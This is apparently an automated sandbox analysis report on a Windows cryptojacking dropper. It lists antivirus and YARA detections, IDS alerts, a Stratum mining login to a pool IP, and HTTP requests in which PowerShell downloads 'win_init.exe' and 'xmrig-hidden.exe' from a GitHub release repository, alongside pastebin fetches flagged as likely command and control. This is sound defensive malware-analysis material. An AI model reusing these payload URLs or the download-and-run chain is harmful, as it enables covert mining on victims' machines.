                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2448, ProcessName: svchost.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-08T16:01:07.839379+010028269302Crypto Currency Mining Activity Detected192.168.2.74969145.144.212.773333TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-08T16:01:43.994336+010018100032Potentially Bad Traffic185.199.108.133443192.168.2.749692TCP
                          2025-03-08T16:02:01.222347+010018100032Potentially Bad Traffic185.199.108.133443192.168.2.749700TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-08T16:01:41.315354+010018100002Potentially Bad Traffic192.168.2.749690140.82.121.3443TCP
                          2025-03-08T16:01:43.984518+010018100002Potentially Bad Traffic192.168.2.749692185.199.108.133443TCP
                          2025-03-08T16:01:57.315071+010018100002Potentially Bad Traffic192.168.2.749697140.82.121.3443TCP
                          2025-03-08T16:02:01.209141+010018100002Potentially Bad Traffic192.168.2.749700185.199.108.133443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\win_init.exeReversingLabs: Detection: 23%
                          Multi AV Scanner detection for submitted file
                          Source: esFK2gm.exeVirustotal: Detection: 22%Perma Link
                          Source: esFK2gm.exeReversingLabs: Detection: 23%
                          Joe Sandbox ML detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

                          Bitcoin Miner

                          barindex
                          Yara detected Fallen Miner
                          Source: Yara matchFile source: esFK2gm.exe, type: SAMPLE
                          Source: Yara matchFile source: 33.2.win_init.exe.a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 33.0.win_init.exe.a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.esFK2gm.exe.990000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.0.win_init.exe.a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.win_init.exe.a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.esFK2gm.exe.990000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: Process Memory Space: esFK2gm.exe PID: 6424, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: win_init.exe PID: 916, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: win_init.exe PID: 6092, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\win_init.exe, type: DROPPED
                          Yara detected Xmrig cryptocurrency miner
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 30.2.win_init.exe.c000160000.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.win_init.exe.c00015e000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.win_init.exe.c00005c400.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.win_init.exe.c00015c000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.win_init.exe.c00015e000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.win_init.exe.c00015a000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.win_init.exe.c000160000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2131272483.000000C0002B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.1619147975.000000C00015E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2131272483.000000C00014A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: esFK2gm.exe PID: 6424, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 7076, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: win_init.exe PID: 916, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: win_init.exe PID: 6092, type: MEMORYSTR
                          Detected Stratum mining protocol
                          Source: global trafficTCP traffic: 192.168.2.7:49691 -> 45.144.212.77:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"494k9wqkjkfgdod9mfnacjedcrhmmmnjtuun8ryfryyphyohmjf5sesh79uom8vfogyevyzthg86r5btgyzxmhentzkajl3","pass":"x","agent":"xmrig/6.22.2 (windows nt 10.0; win64; x64) libuv/1.49.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/yada","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
                          Found strings related to Crypto-Mining
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: XMRig 6.22.2
                          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49690 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49692 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49697 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49700 version: TLS 1.2
                          Source: esFK2gm.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                          Networking

                          barindex
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\System32\notepad.exeNetwork Connect: 45.144.212.77 3333Jump to behavior
                          Connects to a pastebin service (likely for C&C)
                          Source: unknownDNS query: name: pastebin.com
                          Found Tor onion address
                          Source: esFK2gm.exe, 00000000.00000002.2128334068.0000000000C3B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: m=nil base netdnsdomaingophertelnetreturn.local.onionip+netCommonX25519%w%.0wAcceptServerRGBA64Gray16BitBltEndDocLineToSaveDCMulDivrdtscppopcntcmd/goheaderAnswerLengthsecretSTREETavx512rdrandrdseedAppDataRoamingcmd.exedwm.exefloat32float64abortedCopySidFreeSidSleepExWSARecvWSASendconnectsignal number UpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTTuesdayJanuaryOctoberMUI_StdMUI_DltconsolePATHEXT19531259765625invaliduintptrChanDir Value>ConvertforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                          Source: win_init.exe, 0000001E.00000002.1608376264.000000000034B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: m=nil base netdnsdomaingophertelnetreturn.local.onionip+netCommonX25519%w%.0wAcceptServerRGBA64Gray16BitBltEndDocLineToSaveDCMulDivrdtscppopcntcmd/goheaderAnswerLengthsecretSTREETavx512rdrandrdseedAppDataRoamingcmd.exedwm.exefloat32float64abortedCopySidFreeSidSleepExWSARecvWSASendconnectsignal number UpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTTuesdayJanuaryOctoberMUI_StdMUI_DltconsolePATHEXT19531259765625invaliduintptrChanDir Value>ConvertforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                          Source: win_init.exe, 00000021.00000000.1666477319.000000000034B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: m=nil base netdnsdomaingophertelnetreturn.local.onionip+netCommonX25519%w%.0wAcceptServerRGBA64Gray16BitBltEndDocLineToSaveDCMulDivrdtscppopcntcmd/goheaderAnswerLengthsecretSTREETavx512rdrandrdseedAppDataRoamingcmd.exedwm.exefloat32float64abortedCopySidFreeSidSleepExWSARecvWSASendconnectsignal number UpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTTuesdayJanuaryOctoberMUI_StdMUI_DltconsolePATHEXT19531259765625invaliduintptrChanDir Value>ConvertforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                          Source: esFK2gm.exeString found in binary or memory: m=nil base netdnsdomaingophertelnetreturn.local.onionip+netCommonX25519%w%.0wAcceptServerRGBA64Gray16BitBltEndDocLineToSaveDCMulDivrdtscppopcntcmd/goheaderAnswerLengthsecretSTREETavx512rdrandrdseedAppDataRoamingcmd.exedwm.exefloat32float64abortedCopySidFreeSidSleepExWSARecvWSASendconnectsignal number UpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTTuesdayJanuaryOctoberMUI_StdMUI_DltconsolePATHEXT19531259765625invaliduintptrChanDir Value>ConvertforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                          Source: win_init.exe.5.drString found in binary or memory: m=nil base netdnsdomaingophertelnetreturn.local.onionip+netCommonX25519%w%.0wAcceptServerRGBA64Gray16BitBltEndDocLineToSaveDCMulDivrdtscppopcntcmd/goheaderAnswerLengthsecretSTREETavx512rdrandrdseedAppDataRoamingcmd.exedwm.exefloat32float64abortedCopySidFreeSidSleepExWSARecvWSASendconnectsignal number UpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTTuesdayJanuaryOctoberMUI_StdMUI_DltconsolePATHEXT19531259765625invaliduintptrChanDir Value>ConvertforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                          Source: global trafficTCP traffic: 192.168.2.7:49691 -> 45.144.212.77:3333
                          Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                          Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                          Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                          Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                          Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                          Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                          Source: Joe Sandbox ViewASN Name: HPC-MVM-ASHU HPC-MVM-ASHU
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.7:49691 -> 45.144.212.77:3333
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49692 -> 185.199.108.133:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49690 -> 140.82.121.3:443
                          Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.108.133:443 -> 192.168.2.7:49692
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49697 -> 140.82.121.3:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49700 -> 185.199.108.133:443
                          Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.108.133:443 -> 192.168.2.7:49700
                          Source: global trafficHTTP traffic detected: GET /letzchipman7/fallen/releases/download/v1.0.0/win_init.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/b85117f6-f40e-4d84-a04c-3aa968aaa835?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250308%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250308T150112Z&X-Amz-Expires=300&X-Amz-Signature=2f50835d107e60196aeecf6b023e020f551313dafca893d142bfa1470b05bf57&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dwin_init.exe&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /letzchipman7/fallen/releases/download/v1.0.0/win_init.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/b85117f6-f40e-4d84-a04c-3aa968aaa835?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250308%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250308T150112Z&X-Amz-Expires=300&X-Amz-Signature=2f50835d107e60196aeecf6b023e020f551313dafca893d142bfa1470b05bf57&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dwin_init.exe&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/ea8c5442-d9b8-4ab4-85a4-be28e4f102f4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250308%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250308T150116Z&X-Amz-Expires=300&X-Amz-Signature=0f37b4cbb455519c9df494d17094b758c6c2402fd8b2b9f465fe91e23d49f9f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-hidden.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exeAccept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /letzchipman7/fallen/releases/download/v1.0.0/win_init.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/b85117f6-f40e-4d84-a04c-3aa968aaa835?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250308%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250308T150112Z&X-Amz-Expires=300&X-Amz-Signature=2f50835d107e60196aeecf6b023e020f551313dafca893d142bfa1470b05bf57&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dwin_init.exe&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /letzchipman7/fallen/releases/download/v1.0.0/win_init.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/b85117f6-f40e-4d84-a04c-3aa968aaa835?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250308%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250308T150112Z&X-Amz-Expires=300&X-Amz-Signature=2f50835d107e60196aeecf6b023e020f551313dafca893d142bfa1470b05bf57&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dwin_init.exe&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/ea8c5442-d9b8-4ab4-85a4-be28e4f102f4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250308%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250308T150116Z&X-Amz-Expires=300&X-Amz-Signature=0f37b4cbb455519c9df494d17094b758c6c2402fd8b2b9f465fe91e23d49f9f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-hidden.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exeAccept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/941574414/ea8c5442-d9b8-4ab4-85a4-be28e4f102f4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250308%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250308T150116Z&X-Amz-Expires=300&X-Amz-Signature=0f37b4cbb455519c9df494d17094b758c6c2402fd8b2b9f465fe91e23d49f9f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-hidden.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exeAccept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                          Source: global trafficHTTP traffic detected: GET /raw/i3kvksAW HTTP/1.1Host: pastebin.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                          Source: global trafficDNS traffic detected: DNS query: github.com
                          Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                          Source: global trafficDNS traffic detected: DNS query: pastebin.com
                          Source: svchost.exe, 0000000D.00000002.2131806167.000001D639800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                          Source: edb.log.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                          Source: powershell.exe, 00000005.00000002.1364575138.000001BF34401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1364575138.000001BF342CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1595093978.00000272101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1498144988.00000272019B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1595093978.000002721007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387B79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://objects.githubusercontent.com
                          Source: powershell.exe, 00000009.00000002.1498144988.0000027200222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: svchost.exe, 0000000D.00000002.2130300430.000001D6342B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF24251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1498144988.0000027200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1671666039.000001314869D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000009.00000002.1498144988.0000027200222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: svchost.exe, 00000012.00000002.1440886455.0000025DCC213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF24251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1498144988.0000027200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1671666039.0000013148688000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1671666039.000001314869D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                          Source: powershell.exe, 00000009.00000002.1595093978.000002721007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000009.00000002.1595093978.000002721007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000009.00000002.1595093978.000002721007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                          Source: svchost.exe, 00000012.00000003.1431448776.0000025DCC25D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441135085.0000025DCC27F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1431958185.0000025DCC259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1431283067.0000025DCC269000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
